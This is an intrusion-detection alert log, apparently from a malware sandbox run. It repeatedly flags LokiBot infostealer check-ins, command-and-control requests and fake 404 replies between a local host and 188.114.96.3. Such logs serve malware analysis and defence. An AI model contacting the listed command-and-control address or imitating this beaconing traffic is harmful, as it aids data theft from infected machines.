2024-09-25T15:29:39.928784+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55944	188.114.96.3	80	TCP
2024-09-25T15:29:40.653978+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55944	188.114.96.3	80	TCP
2024-09-25T15:29:40.653978+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55944	188.114.96.3	80	TCP
2024-09-25T15:29:40.659576+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55944	TCP
2024-09-25T15:29:40.808147+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55945	188.114.96.3	80	TCP
2024-09-25T15:29:40.808147+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55945	188.114.96.3	80	TCP
2024-09-25T15:29:40.808147+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55945	188.114.96.3	80	TCP
2024-09-25T15:29:41.471815+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55945	188.114.96.3	80	TCP
2024-09-25T15:29:41.471815+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55945	188.114.96.3	80	TCP
2024-09-25T15:29:41.476685+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55945	TCP
2024-09-25T15:29:41.638243+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55946	188.114.96.3	80	TCP
2024-09-25T15:29:41.638243+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55946	188.114.96.3	80	TCP
2024-09-25T15:29:41.638243+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55946	188.114.96.3	80	TCP
2024-09-25T15:29:42.305950+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55946	188.114.96.3	80	TCP
2024-09-25T15:29:42.305950+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55946	188.114.96.3	80	TCP
2024-09-25T15:29:42.310743+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55946	TCP
2024-09-25T15:29:42.475611+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55947	188.114.96.3	80	TCP
2024-09-25T15:29:42.475611+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55947	188.114.96.3	80	TCP
2024-09-25T15:29:42.475611+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55947	188.114.96.3	80	TCP
2024-09-25T15:29:43.162638+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55947	188.114.96.3	80	TCP
2024-09-25T15:29:43.162638+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55947	188.114.96.3	80	TCP
2024-09-25T15:29:43.167479+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55947	TCP
2024-09-25T15:29:43.324953+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55948	188.114.96.3	80	TCP
2024-09-25T15:29:43.324953+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55948	188.114.96.3	80	TCP
2024-09-25T15:29:43.324953+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55948	188.114.96.3	80	TCP
2024-09-25T15:29:44.097010+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55948	188.114.96.3	80	TCP
2024-09-25T15:29:44.097010+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55948	188.114.96.3	80	TCP
2024-09-25T15:29:44.101969+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55948	TCP
2024-09-25T15:29:44.263622+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55949	188.114.96.3	80	TCP
2024-09-25T15:29:44.263622+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55949	188.114.96.3	80	TCP
2024-09-25T15:29:44.263622+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55949	188.114.96.3	80	TCP
2024-09-25T15:29:45.056343+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55949	188.114.96.3	80	TCP
2024-09-25T15:29:45.056343+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55949	188.114.96.3	80	TCP
2024-09-25T15:29:45.061185+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55949	TCP
2024-09-25T15:29:45.374185+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55950	188.114.96.3	80	TCP
2024-09-25T15:29:45.374185+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55950	188.114.96.3	80	TCP
2024-09-25T15:29:45.374185+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55950	188.114.96.3	80	TCP
2024-09-25T15:29:46.147975+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55950	188.114.96.3	80	TCP
2024-09-25T15:29:46.147975+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55950	188.114.96.3	80	TCP
2024-09-25T15:29:46.152919+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55950	TCP
2024-09-25T15:29:46.306365+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55951	188.114.96.3	80	TCP
2024-09-25T15:29:46.306365+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55951	188.114.96.3	80	TCP
2024-09-25T15:29:46.306365+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55951	188.114.96.3	80	TCP
2024-09-25T15:29:47.186447+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55951	188.114.96.3	80	TCP
2024-09-25T15:29:47.186447+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55951	188.114.96.3	80	TCP
2024-09-25T15:29:47.191361+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55951	TCP
2024-09-25T15:29:47.360807+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55952	188.114.96.3	80	TCP
2024-09-25T15:29:47.360807+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55952	188.114.96.3	80	TCP
2024-09-25T15:29:47.360807+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55952	188.114.96.3	80	TCP
2024-09-25T15:29:48.240064+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55952	188.114.96.3	80	TCP
2024-09-25T15:29:48.240064+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55952	188.114.96.3	80	TCP
2024-09-25T15:29:48.244918+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55952	TCP
2024-09-25T15:29:48.414802+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55953	188.114.96.3	80	TCP
2024-09-25T15:29:48.414802+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55953	188.114.96.3	80	TCP
2024-09-25T15:29:48.414802+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55953	188.114.96.3	80	TCP
2024-09-25T15:29:49.512910+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55953	188.114.96.3	80	TCP
2024-09-25T15:29:49.512910+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55953	188.114.96.3	80	TCP
2024-09-25T15:29:49.520363+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55953	TCP
2024-09-25T15:29:49.677411+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55954	188.114.96.3	80	TCP
2024-09-25T15:29:49.677411+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55954	188.114.96.3	80	TCP
2024-09-25T15:29:49.677411+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55954	188.114.96.3	80	TCP
2024-09-25T15:29:50.344616+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55954	188.114.96.3	80	TCP
2024-09-25T15:29:50.344616+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55954	188.114.96.3	80	TCP
2024-09-25T15:29:50.349453+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55954	TCP
2024-09-25T15:29:50.524174+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55955	188.114.96.3	80	TCP
2024-09-25T15:29:50.524174+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55955	188.114.96.3	80	TCP
2024-09-25T15:29:50.524174+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55955	188.114.96.3	80	TCP
2024-09-25T15:29:51.275783+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55955	188.114.96.3	80	TCP
2024-09-25T15:29:51.275783+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55955	188.114.96.3	80	TCP
2024-09-25T15:29:51.280707+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55955	TCP
2024-09-25T15:29:51.428232+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55956	188.114.96.3	80	TCP
2024-09-25T15:29:51.428232+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55956	188.114.96.3	80	TCP
2024-09-25T15:29:51.428232+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55956	188.114.96.3	80	TCP
2024-09-25T15:29:52.197836+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55956	188.114.96.3	80	TCP
2024-09-25T15:29:52.197836+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55956	188.114.96.3	80	TCP
2024-09-25T15:29:52.202676+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55956	TCP
2024-09-25T15:29:52.541643+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55957	188.114.96.3	80	TCP
2024-09-25T15:29:52.541643+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55957	188.114.96.3	80	TCP
2024-09-25T15:29:52.541643+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55957	188.114.96.3	80	TCP
2024-09-25T15:29:53.229813+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55957	188.114.96.3	80	TCP
2024-09-25T15:29:53.229813+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55957	188.114.96.3	80	TCP
2024-09-25T15:29:53.234693+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55957	TCP
2024-09-25T15:29:53.383135+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55958	188.114.96.3	80	TCP
2024-09-25T15:29:53.383135+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55958	188.114.96.3	80	TCP
2024-09-25T15:29:53.383135+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55958	188.114.96.3	80	TCP
2024-09-25T15:29:54.101488+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55958	188.114.96.3	80	TCP
2024-09-25T15:29:54.101488+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55958	188.114.96.3	80	TCP
2024-09-25T15:29:54.106348+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55958	TCP
2024-09-25T15:29:54.258505+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55959	188.114.96.3	80	TCP
2024-09-25T15:29:54.258505+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55959	188.114.96.3	80	TCP
2024-09-25T15:29:54.258505+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55959	188.114.96.3	80	TCP
2024-09-25T15:29:54.972069+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55959	188.114.96.3	80	TCP
2024-09-25T15:29:54.972069+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55959	188.114.96.3	80	TCP
2024-09-25T15:29:54.976956+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55959	TCP
2024-09-25T15:29:55.425796+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55960	188.114.96.3	80	TCP
2024-09-25T15:29:55.425796+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55960	188.114.96.3	80	TCP
2024-09-25T15:29:55.425796+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55960	188.114.96.3	80	TCP
2024-09-25T15:29:56.064141+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55960	188.114.96.3	80	TCP
2024-09-25T15:29:56.064141+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55960	188.114.96.3	80	TCP
2024-09-25T15:29:56.069027+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55960	TCP
2024-09-25T15:29:56.224619+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55961	188.114.96.3	80	TCP
2024-09-25T15:29:56.224619+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55961	188.114.96.3	80	TCP
2024-09-25T15:29:56.224619+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55961	188.114.96.3	80	TCP
2024-09-25T15:29:56.901470+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55961	188.114.96.3	80	TCP
2024-09-25T15:29:56.901470+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55961	188.114.96.3	80	TCP
2024-09-25T15:29:56.906316+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55961	TCP
2024-09-25T15:29:57.052272+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55962	188.114.96.3	80	TCP
2024-09-25T15:29:57.052272+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55962	188.114.96.3	80	TCP
2024-09-25T15:29:57.052272+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55962	188.114.96.3	80	TCP
2024-09-25T15:29:57.735297+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55962	188.114.96.3	80	TCP
2024-09-25T15:29:57.735297+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55962	188.114.96.3	80	TCP
2024-09-25T15:29:57.741467+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55962	TCP
2024-09-25T15:29:58.164945+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55963	188.114.96.3	80	TCP
2024-09-25T15:29:58.164945+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55963	188.114.96.3	80	TCP
2024-09-25T15:29:58.164945+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55963	188.114.96.3	80	TCP
2024-09-25T15:29:58.842437+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55963	188.114.96.3	80	TCP
2024-09-25T15:29:58.842437+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55963	188.114.96.3	80	TCP
2024-09-25T15:29:58.847290+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55963	TCP
2024-09-25T15:29:58.987927+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55964	188.114.96.3	80	TCP
2024-09-25T15:29:58.987927+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55964	188.114.96.3	80	TCP
2024-09-25T15:29:58.987927+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55964	188.114.96.3	80	TCP
2024-09-25T15:29:59.669969+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55964	188.114.96.3	80	TCP
2024-09-25T15:29:59.669969+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55964	188.114.96.3	80	TCP
2024-09-25T15:29:59.674829+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55964	TCP
2024-09-25T15:29:59.835835+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55965	188.114.96.3	80	TCP
2024-09-25T15:29:59.835835+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55965	188.114.96.3	80	TCP
2024-09-25T15:29:59.835835+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55965	188.114.96.3	80	TCP
2024-09-25T15:30:00.558633+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55965	188.114.96.3	80	TCP
2024-09-25T15:30:00.558633+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55965	188.114.96.3	80	TCP
2024-09-25T15:30:00.564280+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55965	TCP
2024-09-25T15:30:00.716018+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55966	188.114.96.3	80	TCP
2024-09-25T15:30:00.716018+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55966	188.114.96.3	80	TCP
2024-09-25T15:30:00.716018+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55966	188.114.96.3	80	TCP
2024-09-25T15:30:01.627418+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55966	188.114.96.3	80	TCP
2024-09-25T15:30:01.627418+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55966	188.114.96.3	80	TCP
2024-09-25T15:30:01.632246+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55966	TCP
2024-09-25T15:30:01.920768+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55967	188.114.96.3	80	TCP
2024-09-25T15:30:01.920768+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55967	188.114.96.3	80	TCP
2024-09-25T15:30:01.920768+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55967	188.114.96.3	80	TCP
2024-09-25T15:30:02.596189+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55967	188.114.96.3	80	TCP
2024-09-25T15:30:02.596189+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55967	188.114.96.3	80	TCP
2024-09-25T15:30:02.601054+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55967	TCP
2024-09-25T15:30:02.761283+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55968	188.114.96.3	80	TCP
2024-09-25T15:30:02.761283+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55968	188.114.96.3	80	TCP
2024-09-25T15:30:02.761283+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55968	188.114.96.3	80	TCP
2024-09-25T15:30:03.523662+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55968	188.114.96.3	80	TCP
2024-09-25T15:30:03.523662+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55968	188.114.96.3	80	TCP
2024-09-25T15:30:03.528472+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55968	TCP
2024-09-25T15:30:03.946516+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55969	188.114.96.3	80	TCP
2024-09-25T15:30:03.946516+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55969	188.114.96.3	80	TCP
2024-09-25T15:30:03.946516+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55969	188.114.96.3	80	TCP
2024-09-25T15:30:05.068828+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55969	188.114.96.3	80	TCP
2024-09-25T15:30:05.068828+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55969	188.114.96.3	80	TCP
2024-09-25T15:30:05.073629+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55969	TCP
2024-09-25T15:30:05.226430+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55970	188.114.96.3	80	TCP
2024-09-25T15:30:05.226430+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55970	188.114.96.3	80	TCP
2024-09-25T15:30:05.226430+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55970	188.114.96.3	80	TCP
2024-09-25T15:30:06.054434+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55970	188.114.96.3	80	TCP
2024-09-25T15:30:06.054434+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55970	188.114.96.3	80	TCP
2024-09-25T15:30:06.059293+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55970	TCP
2024-09-25T15:30:06.440249+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55971	188.114.96.3	80	TCP
2024-09-25T15:30:06.440249+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55971	188.114.96.3	80	TCP
2024-09-25T15:30:06.440249+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55971	188.114.96.3	80	TCP
2024-09-25T15:30:07.461247+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55971	188.114.96.3	80	TCP
2024-09-25T15:30:07.461247+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55971	188.114.96.3	80	TCP
2024-09-25T15:30:07.466088+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55971	TCP
2024-09-25T15:30:07.613698+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55972	188.114.96.3	80	TCP
2024-09-25T15:30:07.613698+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55972	188.114.96.3	80	TCP
2024-09-25T15:30:07.613698+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55972	188.114.96.3	80	TCP
2024-09-25T15:30:08.370283+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55972	188.114.96.3	80	TCP
2024-09-25T15:30:08.370283+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55972	188.114.96.3	80	TCP
2024-09-25T15:30:08.379045+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55972	TCP
2024-09-25T15:30:08.520224+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55973	188.114.96.3	80	TCP
2024-09-25T15:30:08.520224+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55973	188.114.96.3	80	TCP
2024-09-25T15:30:08.520224+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55973	188.114.96.3	80	TCP
2024-09-25T15:30:09.181372+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55973	188.114.96.3	80	TCP
2024-09-25T15:30:09.181372+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55973	188.114.96.3	80	TCP
2024-09-25T15:30:09.189852+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55973	TCP
2024-09-25T15:30:09.339418+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55974	188.114.96.3	80	TCP
2024-09-25T15:30:09.339418+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55974	188.114.96.3	80	TCP
2024-09-25T15:30:09.339418+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55974	188.114.96.3	80	TCP
2024-09-25T15:30:10.051609+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55974	188.114.96.3	80	TCP
2024-09-25T15:30:10.051609+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55974	188.114.96.3	80	TCP
2024-09-25T15:30:10.056504+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55974	TCP
2024-09-25T15:30:10.220925+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55975	188.114.96.3	80	TCP
2024-09-25T15:30:10.220925+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55975	188.114.96.3	80	TCP
2024-09-25T15:30:10.220925+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55975	188.114.96.3	80	TCP
2024-09-25T15:30:10.861804+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55975	188.114.96.3	80	TCP
2024-09-25T15:30:10.861804+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55975	188.114.96.3	80	TCP
2024-09-25T15:30:10.866580+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55975	TCP
2024-09-25T15:30:11.026164+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55976	188.114.96.3	80	TCP
2024-09-25T15:30:11.026164+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55976	188.114.96.3	80	TCP
2024-09-25T15:30:11.026164+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55976	188.114.96.3	80	TCP
2024-09-25T15:30:12.048794+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55976	188.114.96.3	80	TCP
2024-09-25T15:30:12.048794+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55976	188.114.96.3	80	TCP
2024-09-25T15:30:12.057825+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55976	TCP
2024-09-25T15:30:12.218161+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55977	188.114.96.3	80	TCP
2024-09-25T15:30:12.218161+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55977	188.114.96.3	80	TCP
2024-09-25T15:30:12.218161+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55977	188.114.96.3	80	TCP
2024-09-25T15:30:12.921894+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55977	188.114.96.3	80	TCP
2024-09-25T15:30:12.921894+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55977	188.114.96.3	80	TCP
2024-09-25T15:30:12.928806+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55977	TCP
2024-09-25T15:30:13.173782+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55978	188.114.96.3	80	TCP
